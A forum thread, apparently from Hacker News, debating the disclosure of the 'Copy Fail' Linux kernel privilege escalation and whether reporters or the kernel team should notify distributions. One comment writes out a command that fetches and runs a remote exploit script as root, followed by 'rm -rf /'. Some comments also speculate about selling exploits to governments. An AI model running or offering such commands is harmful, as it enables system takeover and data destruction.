the real problem is:
>It's also worrying that it seems there's no communication between the kernel security team and distribution maintainers.
the reporter should not be the one responsible for reporting separately to every single downstream of the thing they found a vuln in.
what should be happening, as you allude to, is a communication channel between the kernel security team and distribution maintainers. the kernel team is in a much better position to coordinate and communicate with the distros than random reporters are.
the minute the patch landed in the kernel, a notification should have gone out from the kernel team to a curated list of distro security folk that communicated the importance of the patch, and that the public disclosure would be in 30 days.
Not "separately to every single downstream", there is the "linux-distros" mailing list for disclosures: https://oss-security.openwall.org/wiki/mailing-lists/distros
This random blogpost from 2022 serves as a proof that disclosing kernel vulnerabilities to the distros list is a well-known practice: https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-...
I agree it's a shame that the process isn't more streamlined and the kernel developers aren't forwarding the reports to the distros list.
They are professional security researchers, they must know this is the way it is done in the ecosystem.
Kicking the can around leads nowhere.
just as a note, it's not as simple as firing off an email to linux-distros and calling it a day.
Qualys, one of the big firms (10,000+ customers across 130 countries), has even taken a stance against emailing linux-distros because of the restrictions and policies involved:
> Although contacting the linux-distros list has been clearly beneficial
> (they have thoroughly reviewed and tested the patches, and were able to
> prepare their kernel updates beforehand), we have reached the conclusion
> that it has become increasingly difficult to coordinate the disclosure
> of kernel vulnerabilities with both groups (the Linux kernel security
> team and the linux-distros list), because they have very different
> policies. From now on, we will coordinate the disclosure of kernel
> vulnerabilities with the Linux kernel security team only. We also
> apologize in advance for this.

It's certainly a thing some people do. But there is no unified consensus on how to handle vulnerabilities. Different security researchers (or, in fact, the same researchers releasing different findings) can and do take many different courses of action.
The kernel devs patched the kernel. The kernel devs have a pretty known, straightforward stance in how they ship fixes for anything, because anything in the kernel can be a security problem.
Distro maintainers can see kernel changes. Some distros aggressively track new changes. Others backport what they feel are relevant. Others don’t do either.
Users pick what distro they use, and how they set up their infra.
Maybe if I were paying for RHEL licenses I’d be eyeballing the money I pay and RHEL’s response time.
But the ownership here lies with system operators, who pick their infrastructure, who design their security model, and who build their operational workflows. This vuln is a great example: people who looked at shared untrusted workloads on a single kernel and said “Hell no” had a much calmer day than teams who thought that was a good idea.
In terms of something actionable (and maybe someone better versed in how the distros work can tell me why this is a bad idea): shouldn't there be a documented process and channel for critical CVEs to be bubbled out to distro maintainers, who then have some sort of SLA for patching them and shipping them downstream to end users? Perhaps incentives are not aligned to produce this outcome.
Otherwise, it’s on the end user. Distro volunteers don’t owe you anything. Kernel devs don’t owe you anything.
I don’t care about what would be the most effective way of doing things. I care about what folks involved actually owe to each other, and distro volunteers don’t owe users any kind of active chasing of remediation due to the user’s threat model.
The problem with making some kind of streamlined process that solves what you didn't like about this vulnerability's remediation is that it ignores basically all the complexity. Like "what about distros that don't abide by embargoes?" or "which distros count as ones that matter?" or "what about all the vulns that aren't in Linux, but in software that's packaged across many operating systems?"
If you want that, buy a commercial distro of Linux, or use Windows. That's a huge part of Microsoft's value proposition to enterprise: they pay people to stay on top of security patches for you. Same with Red Hat and others.
Expecting anything of unpaid volunteers is unreasonable.
> THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
This vulnerability is, for some threat models, a really big deal. A security group found the vulnerability. They disclosed it. It was patched.
Folks here have gotten all kinds of bent out of shape that the groups involved didn't do things in the way each internet commenter would have liked. But this is the system working.
This vulnerability is, for other threat models, a death sentence.
> A security group found the vulnerability. They disclosed it. It was patched.
It was patched only after some people who should have been notified well in advance happened to notice something was up. That is NOT HOW IT'S SUPPOSED TO WORK.
For as long as the unpatched window remains open, skids will mess around and break things. Organized crime teams will use it for some really nasty hacking/ransomware/exfil/extortion/whatever. I guarantee you, this vuln is powerful and widespread enough that intel orgs will use it to kill targets, if they haven't already been using it for years. And if they have, we can just bank on them pulling out all the stops to take advantage of the remaining time for wreaking havoc. Make a project out of it and see if you can guess some of the future headlines.
Certain folks might not care much because they are citizens of one or more of those orgs' nations, so those targets are welcome to die in their opinion. That's fine. You do you, I'll do me, we'll all just go on doing our thing. But it's all fun and games until the wrong target gets hit and now there's a pact between the Germans and the Austrians being invoked and a few dozen million Europeans die. Or a geopolitical hotspot flares up and overnight 20% of the global petroleum supply chain grinds to a halt. Use your imagination. This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.
How is this different from any other day? Because now we've got a world-changing vuln out in the wild with no distro mitigation on day 1, and who the hell knows how many unscrupulous actors poised to take advantage of it before the fun and games stops. There will be no adults in the room when the miscreants decide to deploy while they still can.
Is this vuln going to start the next world war? Probably not. I don't expect it to and I hope and pray it doesn't. But leaving a vuln like this undisclosed to the very people whose job it is to protect us all is playing with fire. Not matches; more like a 10-grams-less-than-critical mass of plutonium.
sam is right to be pissed and he's doing a very good job of hiding it, because he knows that his users are at the mercy of TPTB in the Linux kernel world. Somebody's head needs to roll for this, and I don't mean some dude the CIA wants to hax0r because he's next on the list.
A Linux LPE is a nothingburger unless you’re relying on the Linux kernel to enforce internal security boundaries, which would simply be foolish.
Now, y'all tell me, since I'm not a web guy. How hard is it going to be to tweak this lovely little pathogen into some kind of browser exploit? It just needs to be combined with a sandbox escape to work on current versions, right? Difficult but quite worth investing the time and effort to develop if that's your line of business. If that happens, every at-risk Tails user is going to have to stay offline for a while, unless they want to play the drone lottery.
Or how about chaining it with any of the as-yet unpatched bugs in gawd-only-knows how many web services out there that have poor input sanitization code? That bug now graduates from a DoS crash causer to a root grab. Good luck stopping it with your fancy AI Behavioral Analysis security tools. They better be fast. The sploit is going to do its work in two packets, maybe three. Fun times.
Lucky for us systems monkeys, it's not like anybody is spending billions of dollars to develop vuln finding AI tools right at this very second. So there shouldn't be many unpatched web services holes.
Oh, wait.
Of course, as the grey hats can already tell you, the really delicious part of this thing is how it's going to become the LPE tool of first resort for any APT that's already inside ur base killin ur doodz.
Nothingburger? This nothingburger is going to root a million OS instances before we know what hit us.
cat | python3 && su
<puke>, Ctrl-D
And I'm sure it can be refined into something much more likable to the spooky types, if they haven't already done it.

People who run servers that give out shell access to users or randos already needed to contend with this.
Added later: you may find https://gtfobins.org/ fascinating or horrifying.
$ curl http://my.server.ip.addr/copy_fail_exp.py | python3 && su
# rm -rf / &
25 seconds if I type it out by hand instead of copypasta. Sigh.

Otherwise it's not.
Not sure what the solution could/should be, but surely there could be a better, easier mechanism for kernel to advise all distro maintainers who care, and for those distro maintainers to subscribe in some way. Whether any distro maintainers do so (let alone do something about the vuln notifications) would be entirely up to them. There could also be some easier way for end users to see what the distros' policies on this are, such that they can take that into account when selecting a distro.
We don’t have to agree, but the site rules are pretty clear that swipes like that aren’t ok.
That kind of distro maintainers and kernel devs communication path already exists: the linux-distros@ mailing list. But since anybody can read it, posting “hey everybody, this is a security patch” has basically the same effect as the security researcher posting, in terms of disclosing the vuln to bad actors.
Given that anybody can make a Linux distro, and Linux distros aren’t generally either capable or interested in background checking their teams or policing their individual security practice, it doesn’t seem possible to have a communication channel that distros can sign up for that lacks this problem.
There's not really an enforcement mechanism in FOSS like there is in capitalism world, it just comes down to what we want our part of the world to look like. So I think we'd think more clearly if we leave aside the ideas like "who owes who what." I think it's fun to imagine what sort of motivations and incentives there are if we put away the money ones.
Nonsensical string of words with no meaning.
If you want something that someone else isn't giving you, you have the option to try to do it yourself, or to try to compel someone else to give you what you want somehow. Feel free to, idk, pay someone to track the kernel list and 4000 others and send you heads-ups? Try to pass a law to make people do what you want, since you don't care about words like "owe"?
Yes, exactly, the opposite of paying, since when you pay someone something they owe you whatever you paid for.
If we leave aside owe, deserve, and earn, we can start discussing things like what we want our kernel ecosystem to look like, how we can make it safer, etc, without being burdened by these concepts.
It's a simple intellectual exercise, that's all. If you're having a strong reaction to it, imo that'd make it even more fun for you to participate.
You want someone to do something for you for some other reason than that they owe you.
They already are doing something for you that they don't owe you. They are writing software that you benefit from. You just want them (or somebody) to do something else that they don't owe you.
They aren't, because they don't owe you and it's not something they want to do for fun, and so since the problem is they don't owe you, you wish to set aside words like "owe".
Well sure. Looks like you found the problem and the solution alright. Why didn't anyone else think of that?
If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?
Do you imagine say a dating website where people compete to look attractive by getting points by doing the best job at finding the most bugs and patches and reporting them to the most downstream consumers the fastest?
Exactly! That's what I'm interested in exploring.
> If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?
That's what I love exploring. Action with no obligation. Have you any examples of that in your life? Nobody obligates me to do the long walks I enjoy where I stick a 360 camera on my head and then upload the footage to Mapillary and other open platforms, I just like to do it, and I want to find other things that I'm motivated to do without obligation, and I'm fascinated by things people do for "no reason." Understanding human motivation is really important to me for some reason.
As to "what then," yes what then? If I run a cashless commune, how do we make sure the toilets get cleaned? That's the whole question, and I love exploring it. If you'd like to experience it yourself, you could always try attending a regional Burn for a bit of a micro version of it, people doing things just for the sake of it.
I'm sorry, I don't quite understand what you mean by the dating app thing.
Who decides who is a trustworthy distro maintainer? In the open source world everyone is equal, no favorites are chosen. If your point is that the distros backed by companies making at least $x million revenue a year should get priority disclosure... pretty sure somebody will take issue with this.
And it's not like a hypothetical issue either. Given the high stakes, bad actors are highly incentivized to masquerade as some small scale niche distro until they get their effectively free zero day CVE.
Linux, like every open source project, is just a bunch of people who are YOLOing it. Not something you use for your Fortune 500 mission-critical infrastructure.
But from what I understand they were not given enough information to know if it was relevant or not. The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.
If the commit message says it fixes a security bug, then bad actors immediately know there's a possible exploit there. So maybe it's intentional? (not familiar with the policy for this)
They dropped the ball when they shipped supposedly secure systems where their method for getting alerted to security updates was "hope people reporting to upstream will also notice a mailing list that will alert them".
(Caveat: distros like Ubuntu advertise security updates, so this is on them. I'm not sure Gentoo does that; if they don't, well, then no one dropped the ball, because no one represented that Gentoo got prompt security updates.)
"There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly."
“30 days should be enough time” why? Why is 30 days a magic number? Especially in open source.
Yeah, it isn't the researcher's problem to tell every distributor of the kernel about the fix or verify that everyone has the fix, but fuck, maybe wait until at least someone has the fix, and maybe don't drop it on a Friday. That is just malicious.
But, even if I agreed with you, how do you propose they tell the patchers this that doesn’t tell the whole world?
And they dropped it on a Wednesday.
If researchers want to showcase their ability (either individually or as an organization) to identify and address security vulnerabilities in complex multi-stakeholder environments, I very much expect them to figure this out. After all, it doesn't make much sense if a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions, so that identified issues are resolved with minimal impact to the business.
These vendor interactions you're referring to are the company's customers, correct? Are you proposing the company hire another company to manage getting updates to their customers?
Feels like the more sensible process would be for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability and for distro maintainers to pay attention to that. Could be done without revealing what the vulnerability actually is in most cases, trusting the kernel maintainer's judgement. There does seem to be a public linux-cve-announce mailing list.
Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.
People have gotten so used to the Github flavour of free-labour, social-network-style FOSS that they've forgotten what all those LICENSE files actually say, which is to make it explicitly clear that the devs are not responsible to you for your issues, up to and including the software setting your house on fire. If you don't like it, you don't have to use it.
They can't, because (responsible) security disclosures are private, _not public_. That's the whole point of the system: notify the developers in private ahead of time (usually 30, 60 or 90 days) so they can write, test and roll-out the fixes before you release the info to the whole world. This is to minimize the time between when bad actors gain access to the exploits vs. when users install the patch. So "keeping up on security disclosures" cannot ever be a 'pull' process.
Usually the maintainers of the big distros are part of (private) security mailinglists and receive such info. Just not in this case it seems.
Sending emails to some big distros would still result in e.g. Gentoo not getting that info, because they are not a big distro.
Not ideal, but also: shit happens? It's always a balancing act choosing the lesser of multiple evils and most of the time it seems to work ok-ish, which is probably the best we can hope for ;-P
For this specific "bug" they took care to not mention any security angle in the commit message, making it extremely hard for an outsider to even realize this was a critical patch. I assume this was because they wanted to push the fix without breaking embargo.
The post you are responding to says that it would be nice if they copied literally one mailing list.
Who would curate that list though? You don't need permission from the kernel team to spin up a new distro. I can go and create fork of Debian or Arch or whatever today and the kernel team would never know (and neither should they).
This is completely in the responsibility of the distros. If you don't like this model, use something like FreeBSD.
You don't need anyone's permission to make a distro, that's true, but if you notify Debian, Canonical, Fedora, Red Hat and Arch you're covering a very large fraction of users; way more than today's 0%. In cases like this, perfect is the enemy of the good.
The name is a misnomer.
Given this was announced when backports weren't ready (and given the POC was at least opaque if not obfuscated), I'm getting the vibe fixing the vuln wasn't as high a priority as making a media splash.
> Note that for Linux kernel vulnerabilities, unless the reporter chooses
> to bring it to the linux-distros ML, there is no heads-up to
> distributions.
so, no, the `linux-distros` list doesn't solve the problem.
They openly refuse to do this and have been given authority by MITRE to work against any such process.
There would be a lot of people gloating if this happened to MS.
Linux is a free kernel that literally revolutionized the computing landscape.
There are only 2 words in this term, and neither one even slightly applies.
A sacred cow is called a sacred cow because there is no reason for it to be sacred.
Linux is perfectly subject to criticism, and so not at all sacred.
Linux has earned a stunning amount of respect and gratitude by actually providing stunning utility and quality. I.e., it's not just a random object like a cow that everyone decided to worship for no reason.
Spoken as a FreeBSD user who has plenty of critiques of the entire Linux ecosystem.
I agree.
> A sacred cow is called a sacred cow because there is no reason for it to be sacred.
Here we diverge. Linux earns sacred cow status when people interpret legitimate criticism of it as an attack that must be debunked or dismissed. And there's plenty of that happening in this forum; you may not be treating it as a sacred cow, but plenty of people are.
And to expound on why it even matters, it does a disservice to Linux to treat it this way: if you can't engage with its flaws, you'll never help fix them, and instead attack people who try.
It's 2026. We're more than 30 years into the Linux ecosystem. I don't believe this bullshit for a moment.
Given how trivially users can implement a mitigation, distributions could have done _something_ to protect their users prior to the publication date. A handful of messages is all that was required, not "every single downstream"; that is a straw man.
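For what it's worth, "trivially implement mitigation" here can be as small as a one-line config drop. Purely as a hedged sketch, on the assumption that the bug is only reachable by autoloading the algif_aead module named in the upstream commit (verify against your distro's actual guidance before relying on this, and the filename is my own invention):

```
# /etc/modprobe.d/disable-algif-aead.conf  (hypothetical stopgap)
# Refuse to autoload the module until a fixed kernel is installed.
# Anything that legitimately needs AF_ALG AEAD will break while this is in place.
install algif_aead /bin/false
```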
The publication of a bug that trivially gains root on an incredible number of Linux installs that was discovered using an A.I. tool prior to any of the "downstreams" implementing a fix is intentional. I speculate the motivation is free promotion of the A.I. tool.
yeah, distributions could be following the kernel updates more closely and they would have been patched prior to publication. mainline was patched 30 days before publication.
it is not the reporter's responsibility to babysit the linux distributions.
It is not the responsibility of the initial reporter to communicate to distributions, but the fact that those responsible failed to do that, doesn't give everybody else a free pass.
The thing is, malicious actors are already monitoring most major projects and doing either source analysis or binary analysis to figure out if changes were made to patch a vulnerability. So, as soon as you actually patch, you really need to disclose, because all you're doing by not disclosing the vulnerability is handing the bad actors a free go. The black hats already know. You need to tell the white hats, too, so they can patch.
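To make it concrete how low the bar for this monitoring is: naive patch-gap triage is maybe a dozen lines of shell. This is an illustrative sketch only; the keyword list and example subjects are made up, not any real tool's heuristics:

```shell
#!/bin/sh
# Naive patch-gap triage: scan recent commit subjects touching a
# subsystem and flag ones whose wording smells like a silent security
# fix. Keyword list is invented for the example.
watchlist="revert overflow use-after-free out-of-bounds uninit refcount"

flag_subject() {
    # Succeeds (exit 0) if the commit subject matches any watchlist keyword.
    subject=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    for kw in $watchlist; do
        case "$subject" in
            *"$kw"*) return 0 ;;
        esac
    done
    return 1
}

# In real use you'd feed this from something like:
#   git log --since='30 days ago' --format='%s' -- crypto/
printf '%s\n' \
    "crypto: algif_aead - Revert in-place processing" \
    "crypto: lib - tidy up comments" |
while IFS= read -r subject; do
    if flag_subject "$subject"; then
        echo "REVIEW: $subject"
    fi
done
```

Serious attackers run far richer versions of this (including the LLM-driven pipelines mentioned elsewhere in the thread), which is exactly why "quietly patch, disclose later" only delays the defenders.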
Requiring the security researcher to do it is insane. Should a security researcher that identifies a vulnerability in electron.js need to identify every possible project using electron.js to communicate with them the vulnerability exists? No. That's absurd.
FTFA:
> I see that on the 11th of April 6.19.12 & 6.18.22 were released with the fix backported.
> Longterm 6.12, 6.6, 6.1, 5.15, 5.10 have not received the fix and I don't see anything in the upstream stable queues yet as I write.
I wouldn't go so far as to call this "the kernel devs patched it". Virtually none of the kernels that distros are actually using today have received a fix. This looks like an extremely lackluster response from the kernel security team.
Pretty much the only non-rolling distros that are shipping a fixed kernel are Fedora 44 and Ubuntu 26.04, both released in the last few weeks. Their previous releases both shipped with Linux 6.17, which is still vulnerable today!
But it's been at least 15 years since "reversing means patches are effectively disclosures legible mostly to attackers" became a norm in software security. And that was for closed-source software (most notably Windows). The norms are even laxer for open source.
But this is a false comparison, right? The scope of "Linux distributions" and "electron apps" are orders of magnitude different. If the reporter spot checked one or two of the most popular distributions to see if fixes had been adopted, that seems like an extra level of nice diligence before publicizing the details.
It doesn't seem "insane" as much as "not the most efficient path" as has already been well argued. But it also doesn't seem unreasonable to think in a project of the scope of the Linux kernel, with the potential impact of fairly effective(?) privilege escalation, some extra consideration is reasonable--certainly not "insane" at the very least?
About half the thread we're on reads as if the commenters believe Xint made this vulnerability. They did not: they alerted you to it. It was already there.
> Their job is to bring information to light, not to manage downstreams.
The researchers are also members of a community in which more harm than is necessary may be dealt by their actions. Nuance must exist in evaluating "reasonable" and "responsible" in the context of actions.
If it helps you out any, even though my logic was absolutely the same and just as categorical in 2012 as it is today: there are now multiple automated projects that run every merged Linux commit through frontier models to scope it out for exploitability (against the status quo ante of the patch), and then add hits to libraries of automatically-exploitable bugs.
People here are just mad that they heard about the bug. Serious attackers had this the moment it hit the kernel. This whole debate is kind of farcical. It's about a "real time" response this week to a disaster that struck a month ago.
they did it in the established industry standard way that probably every single security researcher you can think of follows (for good reason, i would add).
whoever did the marketing on "responsible disclosure" was a genius.
tptacek says it much better than me: ""Responsible disclosure" is an Orwellian term cooked up between @Stake and Microsoft and other large vendors to coerce researchers into synchronizing with vendor release schedules."
And it's not as if I'm asking for a lot of effort. One mail to the security team of a popular distro "hey, we have found this LPE that we'll release with exploit next week, it's patched upstream already in this commit, but you don't seem to have picked it up" would likely have been enough.
The problem is that vendors and developers have repeatedly shown that if you give them an inch, they take a mile. Look at exactly what happened with BlueHammer this month. The security researcher went full disclosure because Microsoft didn't listen to their reports.
Disclosure is vital. It's essential. Because the truth is, if a security researcher has found it, it's extremely likely that it's already been found by either black hats or by state actors. Ignorance is not actually protection from exploitation.
The security researcher also has a responsibility to the general public that is still actively using vulnerable software in ignorance. They need to be protected from vendor and developer negligence as well as from exploits. And the only way to protect yourself from an exploit that hasn't yet been patched is to know that it is there.
I'm also not proposing delaying the disclosure to the general public at all. They already waited 30 days with that; that's fine. Just look a bit further than your checklist of only contacting upstream, and send a mail to the distributions a week or two before disclosure if they haven't picked up the fix.
[citation needed]
Is there any evidence that Linux distros (specifically) act in this way? Or a particular distro?
there is ~3 decades of citations you can look at, spread out over every security mailing list, security conference, etc. that you can think of.
one decent start is https://projectzero.google/vulnerability-disclosure-faq.html...
"Prior to Project Zero our researchers had tried a number of different disclosure policies, such as coordinated vulnerability disclosure. [...] "We used this model of disclosure for over a decade, and the results weren’t particularly compelling. Many fixes took over six months to be released, while some of our vulnerability reports went unfixed entirely! We were optimistic that vendors could do better, but we weren’t seeing the improvements to internal triage, patch development, testing, and release processes that we knew would provide the most benefit to users.
[...]
While every vulnerability disclosure policy has certain pros and cons, Project Zero has concluded that a 90-day disclosure deadline policy is currently the best option available for user security. Based on our experiences with using this policy for multiple years across thousands of vulnerability reports, we can say that we’re very satisfied with the results.
[...]
For example, we observed a 40% faster response time from one software vendor when comparing bugs reported against the same target over a 7-year period, while another software vendor doubled the regularity of their security updates in response to our policy."
>Linux distros (specifically) act in this way
carving out special exceptions based on nebulous criteria is a bad idea. 90+30 is what has been settled on, and mostly works.
Because a situation where the development team fails to appreciate the severity of a security vulnerability, and has an established procedure that requires the researcher rather than the kernel team to communicate with downstream users, is already a major failure of process. Security is not just patching the vulnerability, and it seems that the Linux kernel developers or the Linux kernel security team do not understand that.
This is the result of that failure.
If this were any other software, we'd be here with pitchforks and torches. The researcher gave the developers timed disclosure, and even waited until after the developers had patched the issue. And... it's still a problem.
the linux kernel team is in a 10000% better position to communicate to and coordinate their downstreams. it seems completely backwards to me to suggest that the reporter should be responsible for figuring out every possible downstream and opening up separate reports to each of them.
the kernel team should have a process/channel to say "this is important! disclosure is in 30 days" that is received by distro security teams. because this is not the first or last time the kernel will have a local privilege escalation. hoping that every reporter, forever in the future, will take the onus on themselves is a recipe for disappointment.
Gentoo has to take some blame too for not keeping all the kernels they maintain patched in a timely way.
How do you figure that? From what I could tell from the earlier post, the fix has only been backported to 6.18 and later, and as TFA indicates, the distros were not informed of the security implications of this fix. All distros shipping a major kernel version from more than a year ago, and that includes all LTS kernels, are vulnerable, regardless of how "timely" their patch schedules follow upstream.
the baddies are looking at every patch anyways.
Even if the only purpose of looking at the status is to make yourself look good in marketing materials, it's surprising that it didn't happen.
the vulnerability report was submitted to the kernel security team and appropriate kernel maintainers. those are the people responsible for patching the kernel, which they did 30 days ago.
They patched 2 of 7 supported kernels.
is the reporter of that vulnerability responsible for finding and submitting a vulnerability report to every single piece of software that uses left-pad? all ~millions of them?
or do they submit the report to left-pad, get them to fix it at the source, and trust that the people relying on left-pad will update their software like they should when they see a security-relevant update is available?
Those groups don't exist, to my knowledge. And probably can't, realistically speaking.
> Is your software AI-era safe?
> Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. [...]
> [Try Xint Code]
More chaos makes their product seem even more attractive.
I get put into a read-only dashboard with ZERO info. is this live? is this static? how do I use it? the API button just leads me to a swagger doc.
this was a failure of the kernel security team, and their stance on communicating security issues with their downstreams.
Hell, Crowdstrike is still purchased.
Sure, they have no legal obligation to disclose, but we all also have no legal obligation to buy their services. Blacklisting bad actors like this is the right move to discourage this kind of behavior.
they did a proper coordinated disclosure, following the industry standard 90+30 process. that is why the exploit dropped 30 days after the patch landed.
the kernel team should have communicated with their downstream about the importance of the patch. that is the kernel security team's responsibility -- and they are much better positioned to do that than crossing your fingers and hoping every reporter will contact every distro every single time there is a vulnerability.
there are very good reasons disclosure works this way, backed by a couple of decades of debate about it.
I just don't see the point in complaining about how shirking the norms of your industry will make you look irresponsible. I don't really care that they could have decided to sell the vulnerability instead. It isn't material.
Tavis Ormandy dropped Zenbleed right onto Twitter. He's doing fine. You can blacklist him if you want; I imagine he's not going to notice.
There is actually no way to give them a friendly heads up, and then do your own thing. The only way not to be bound is by not sending them any notification at all...
I couldn't find a public copy of that.
The best starting point I found for reporting vulnerabilities was: https://github.com/microsoft/MSRC-Security-Research/security...
You can email without agreeing to anything. But for a serious issue Microsoft would obviously try and track down who you are and what jurisdiction you are in.
> MICROSOFT BOUNTY TERMS & CONDITIONS
> Last updated: July 23, 2025
> The Microsoft Bug Bounty Programs Terms and Conditions ("Terms") cover your participation in the Microsoft Bug Bounty Program (the "Program"). These Terms are between you and Microsoft Corporation ("Microsoft," "us" or "we"). By submitting any vulnerabilities to Microsoft or otherwise participating in the Program in any manner, you accept these Terms.
Who knows if it's enforceable.
Those private actors aren't planning to sit around and hold onto these exploits they've hoarded forevermore; they're obviously paying for them so they can one day use them.
We must get public funds to reward ethical disclosure of big impact vulns like this.
Mostly cover citizens within a very limited set of jurisdictions.
Otherwise there's a chance at extradition.
This is not true in many jurisdictions.
We need an anonymous bounty system.
If so, that's a bit naive. In the actual world, that buyer wants to buy more stuff from me, not penalize me.
And they absolutely have a moral obligation to do things in a way to minimize damage and impact to other people's systems. (I'm not saying "responsible disclosure" is the correct way to do that, but hoarding vulnerabilities and exploits and selling them to the highest bidder certainly isn't.)
This is how society needs to work.
Or at least went dark ..
You'll learn who the buyers are if you routinely have the really good stuff to sell! If you are offering iOS zero click on a semi-regular basis, the buyer is going to want to try to deal with you directly and preferably offer you a more regular form of employment, if you are interested. Some national governments may offer certain benefits to you, depending on your situation.
All depends on what you have to offer. If you were able to offer this https://arstechnica.com/security/2025/09/microsofts-entra-id... or something of that magnitude, a lot of problems in your life would just go away. The buyers would all be Five Eyes and the intelligence gain of having that kind of access even briefly is priceless.
In a more Western-centric context, imagine if you had a flaw like that, same 'no logs are generated' and 'every single customer account is accessible' but the impacted vendor was Alibaba Cloud. The researcher would get to name their price. That's the real world, that's the world we share. We shouldn't be blind to that.
it wasn't sold for profit, it was openly disclosed.
> And they absolutely have a moral obligation to do things in a way to minimize damage and impact to other people's systems.
All that "responsible disclosure" does is keep people from demanding better.
Uh... no? If you mean legally, some people might, depending on jurisdiction. But ethically? Yes, researchers are ethically obligated to disclose responsibly.
> Just fyi.
...
> Be glad it was disclosed at all. Be glad a patch was available prior to release.
I am glad that a patch was available. Equally I can be glad that the linux community is strong enough to respond quickly, while also being angry that this person behaves unethically.
Likewise, when people in my industry behave poorly or unethically, I'm now the person ethically obligated both to point it out and to condemn it, not to become an apologist demanding that I should be happy watching bad things happen, when much of the fallout could have been prevented with a bit less incompetence and ignorance.
I'm so glad these so called "researchers" aren't totally evil, I'm so grateful they're only half evil, give them a lollipop.
Whatever, the way they disclosed it isn't much different from no disclosure at all - the exploit would have been identified in the wild and fixed soon thereafter.
"Researchers"...
non-security people always seem to get up in arms about it, but there are very good reasons why the industry has landed on the process it has, which has been hashed out over a few decades.
1. Status quo. Researchers are free to disclose to a vendor, free to sell vulns to legitimate companies, free to do full disclosure if they want. This situation benefits security. Researchers are able to pay their bills while also doing meaningful research into OSS projects that are unable to fund the kind of security audit they need. Harm reduction, of sorts.
2. Everyone is a bad actor. No one is going to do this work for free/for a bounty. Horrible flaws will be found and shared with ransomware gangs and the like. 0day will sell for a percentage of the ransom winnings. Researchers will live like kings, everyone else will suffer.
Which do you prefer?
If it won’t be handled through criminal law then it’ll be handled through civil litigation: Anyone who was exploited as a result of this disclosure should sue the discloser for contributing to the damage they’ve suffered.
In that world, the vulnerability has more value to those who seek to exploit it for their own motives, regardless of the consequences. They hope that no one else stumbles on it and fixes it, preventing them from continuing to use it to do bad things.
In the world where it is disclosed, there is more value in fixing the vulnerability as the maintainer’s reputation is at risk (and potentially monetary loss or legal liability if they are shown to be negligent).
> In computer security, coordinated vulnerability disclosure (CVD, sometimes known as responsible disclosure)
I guess you can learn something new after 36 years.
If you are referring to what you quoted, your pedantry and sharpshooting would result in an incomplete English sentence: "that's why we have the responsible disclosure" is missing a noun. Now that we are firmly in worthless pedantry:
Protocol (n):
1.a. a system of rules that explain the correct conduct and procedures to be followed in formal situations
1.b. a set of conventions governing the treatment and especially the formatting of data in an electronic communications system
If you don't like what I said or disagree, poke holes in factual inaccuracies. However, in the reality that I am pretty sure we all share, responsible disclosure is a well established protocol that is followed by many security researchers, and was imperfectly followed here.
> You: No, I wouldn't, because my own preferences are towards immediate disclosure.
And there it is. You could have said "I don't think responsible disclosure is a good idea" and moved on, but now we have whatever the fuck this is.
Bluffing sure as hell beats being incapable of being wrong. I'll take it.
As a user and admin I disagree. Makes one appreciate what a masterful bit of lexical engineering “Responsible” Disclosure is, kinda like “Secure” (from me, not for me) Boot — “Responsible” Disclosure is 100% about reputation management for the various corporation/foundation middleman entities sitting between me and my computer.
Those groups don't care that my individual computer is vulnerable but about nobody being able to say “RHEL is vulnerable” or “Ubuntu is vulnerable”. The vulnerability exists for me either way, and I'd rather have the chance to know about it and minimize risk than to be surprised by the fix and hope nothing bad happened in that meantime.
Immediate public disclosure is the only choice that isn't irresponsible as far as I'm concerned.
Even when there is no known use case of the attack (other than the security researcher's)?
> The vulnerability exists for me either way, and I'd rather have the chance to know about it and minimize risk
By the time you hear about it, the money could be gone because 1000 hackers heard about it from the researcher before you did.
> than to be surprised by the fix and hope nothing bad happened in that meantime.
Hope is not a good strategy here.
What could possibly go wrong?
And do you agree with that behaviour?
The real debate here is what went wrong with getting that info downstream, and whose responsibility was that?
No, it's really not.
High severity vulnerabilities are responsibly handled by quietly neutralising them with subtle patches that do not reveal the vulnerability, waiting for those patches to distribute. Then patching or removing the root cause of the vulnerability (at which point opportunists will start to notice), and finally publicly disclosing it when there are already good mitigations in place.
Example: Spectre/Meltdown mitigations.
I've been asked to use this approach myself when reaching out to maintainers. Sometimes it's possible to directly fix the vulnerability as a "side effect" by making a legitimate adjacent change.
That’s what you’re saying here.
https://x.com/spendergrsec/status/2049566830771970483
https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...
Or is everyone expected to upgrade and reboot every 48 hours for all eternity and just deal with potential regressions all the time?
I think this reflects poorly on the original reporters. If you have a weaponized 700-byte universal local root exploit script ready to go, perhaps you should coordinate with major distros for patches to be available before unleashing it on the world. No matter how "veteran" you are.
(This bug does not technically require a reboot to mitigate).
It's a category error to talk about a disclosure event like this as something that would destabilize someone's fleet operations. The Linux kernel is fallible. So is the x64 architecture. You already have to be ready to lock things down and reboot (or mitigate) at a moment's notice.
